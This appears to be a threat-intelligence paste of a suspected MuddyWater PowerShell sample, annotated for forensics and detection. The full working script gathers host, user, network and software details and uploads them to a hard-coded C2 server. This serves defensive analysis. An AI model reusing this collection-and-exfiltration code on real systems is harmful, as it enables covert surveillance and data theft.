vk_intel

2019-01-16: Possible MuddyWater

Jan 17th, 2019
  # Reads the sample's per-victim identifier from %APPDATA%\ID.dat: the line(s) matching "ID=" are split on "="
  # and the right-hand side is returned. When the file is absent nothing is returned, so callers receive $null.
  # Forensic note: %APPDATA%\ID.dat is a host artefact of this sample.
  1. function im(){$d=$env:APPDATA+"\ID.dat";if(test-path $d){$d1=Get-Content $d |Where-Object { $_ -match "ID=";};$d2=$d1 -split "=";return $d2[1];}}
  # Timestamp for the report: Get-Date in the "g" (general short) format, or the literal "Error Time" on failure.
  2. function MyTime(){try{return Get-Date -Format g;}catch{return "Error Time";}}
  # Hostname taken from the COMPUTERNAME environment variable; "Error ComputerName" on failure.
  3. function GetMachineName(){try{return $env:COMPUTERNAME;}catch{return "Error ComputerName";}}
  # Current user from the USERNAME environment variable; "Error Username" on failure.
  4. function GetUserName(){try{return $env:USERNAME;}catch{return "Error Username";}}
  # Logon domain from the USERDOMAIN environment variable; "Error Domain name" on failure.
  5. function GetDomainName(){try{return $env:USERDOMAIN;}catch {return "Error Domain name";}}
  # Operating-system name: the Caption property of the WMI Win32_OperatingSystem class; "Error Os name" on failure.
  # Detection note: a WMI query of Win32_OperatingSystem from a PowerShell host is one of several recon steps here.
  6. function OSDetails(){try{$Name = Get-WmiObject -Class Win32_OperatingSystem;return $Name.caption;}catch {return "Error Os name";}}
  # External IP lookup: a WebClient configured with the system proxy and the caller's default credentials fetches
  # https://api.ipify.org/ and returns the response body as-is (no validation). On any exception the literal
  # "Erro Ip" (sic) is returned. Network-detection note: powershell.exe reaching api.ipify.org is observable egress.
  7. function GetMyIP(){try{$wc = New-Object System.Net.WebClient;$wc.proxy = [Net.WebRequest]::GetSystemWebProxy();
  8. $wc.proxy.Credentials = [Net.CredentialCache]::DefaultCredentials;$readIP = $wc.DownloadString("https://api.ipify.org/");return $readIP;}catch{return "Erro Ip";}}
  # Enumerates user accounts via the WMI Win32_UserAccount class; the raw objects are returned (main pipes them to Out-String).
  9. function g-user{return Get-WmiObject -Class Win32_UserAccount}
  # Registry- and service-based host survey. Builds one multi-section string ($output) covering SMB shares,
  # system environment variables, installed applications, Group Policy history and the output of `net start`,
  # then emits it. $output is never initialised, so the first concatenation starts from $null.
  # Detection note: reads of these HKLM keys plus a `net start` child process from a PowerShell host are the
  # observable footprint of this step.
  10. function Get-Information() {[CmdletBinding()]Param ()
  # Helper: $child -eq "no" -> Get-Item on $regkey itself, otherwise Get-ChildItem (its subkeys). For each key it
  # walks the key's property names: $regvalue "all" emits every value, "allname" emits the property names, any other
  # $regvalue emits that single named property and then breaks out of the inner loop (one result per key).
  11. function registry_values($regkey, $regvalue,$child){if ($child -eq "no"){$key = get-item $regkey;}
  12. else{$key = get-childitem $regkey}$key | ForEach-Object {$values = Get-ItemProperty $_.PSPath; ForEach ($value in $_.Property) { if ($regvalue -eq "all") {$values.$value}
  13. elseif ($regvalue -eq "allname"){$value} else {$values.$regvalue;break}}}}
  # Sections, each joined with CRLF. The Uninstall call passes no $child argument, so $child is $null and the
  # Get-ChildItem branch enumerates the Uninstall subkeys, pulling the DisplayName of each.
  14. $output = $output + "`n`n Shares on the machine:`n" + ((registry_values "hklm:\SYSTEM\CurrentControlSet\services\LanmanServer\Shares" "all" "no") -join "`r`n");
  15. $output = $output + "`n`n Environment variables:`n" + ((registry_values "hklm:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" "all" "no") -join "`r`n");
  16. $output = $output + "`n`n Installed Applications:`n" + ((registry_values "hklm:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" "displayname") -join "`r`n") ;
  17. $output = $output + "`n`n Domain Name:`n" + ((registry_values "hklm:\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\History\" "all" "no") -join "`r`n") ;
  18. $output = $output + "`n`n Running Services:`n" + ((net start) -join "`r`n");$output;}
  # Address of the default .NET web proxy (System.Net.WebProxy::GetDefaultProxy); "error in read proxy" on failure.
  19. function prx(){try{return ([System.Net.WebProxy]::GetDefaultProxy()).Address}catch{return "error in read proxy"}}
  # Exfiltration step. POSTs the file at $filename to the hard-coded endpoint
  # http://amazo0n.serveftp.com/users.php with $tname in the query string (path=Data fixed), through the system
  # proxy with the caller's default credentials and a "binary/octet-stream" Content-Type. The server's response is
  # UTF-8-decoded, trimmed and returned; any exception yields the literal "false". The $id parameter is unused.
  # Network-detection note: the transfer is cleartext HTTP, so the host name and the uploaded body are visible to
  # proxy/IDS inspection; the domain above is the sample's C2 indicator.
  20. function ufile($filename,$id,$tname){try{$url="http://amazo0n.serveftp.com/users.php?tname="+$tname+"&path=Data";$enc=[System.Text.Encoding]::UTF8;$wc = New-Object System.Net.WebClient;
  21. $wc.proxy = [Net.WebRequest]::GetSystemWebProxy();$wc.proxy.Credentials = [Net.CredentialCache]::DefaultCredentials;$wc.Headers.Add("Content-Type", "binary/octet-stream");
  22. $str = $enc.GetString($wc.UploadFile($url,"POST",$filename));$str=$str.trim();return $str;}catch{return "false";}}
  # Collect-and-upload routine. The victim ID from im() names the staging file %TEMP%\<ID>.txt (if ID.dat is
  # missing, $r is $null and the file becomes %TEMP%\.txt). Gathers timestamp, host/user/domain names, OS name,
  # external IP, user accounts, the Get-Information survey, `ipconfig /all` and the proxy address into $det0,
  # writes it with -Encoding default -Force, then uploads it tagged "T_<ID>". There is no $det10; the numbering
  # simply skips it. Forensic note: nothing in the visible code deletes the staging file after upload, so
  # %TEMP%\<ID>.txt may remain on disk; the ufile return value is stored in $d but never used.
  23. function main(){$r=im;$f=$env:TEMP+"\"+$r+".txt";$det1=MyTime;$det2=GetMachineName;$det3=GetUserName;$det4=GetDomainName;$det5=OSDetails;$det6=GetMyIP;$det7=g-user|Out-String;$det8=Get-Information;
  24. $det9=ipconfig /all|Out-String;$det11=prx|Out-String;
  25. $det0="RunTime: "+$det1+"`nMachinName: "+$det2+"`nUserName: "+$det3+"`nDomainName: "+$det4+"`nOsName: "+$det5+"`nIP: "+$det6+"`nG-user: "+$det7+"`nG_INF: "+$det8+"`nIPCONFIG: "+$det9+"`nProxy: "+$det11;
  26. $det0 | out-file $f -Encoding default -Force;$tname="T_"+$r;$d=ufile $f $r $tname;}
  # Script entry point: runs the survey-and-upload routine once. Nothing in this listing schedules it or persists
  # it on the host; any persistence would come from whatever launched the script.
  27. main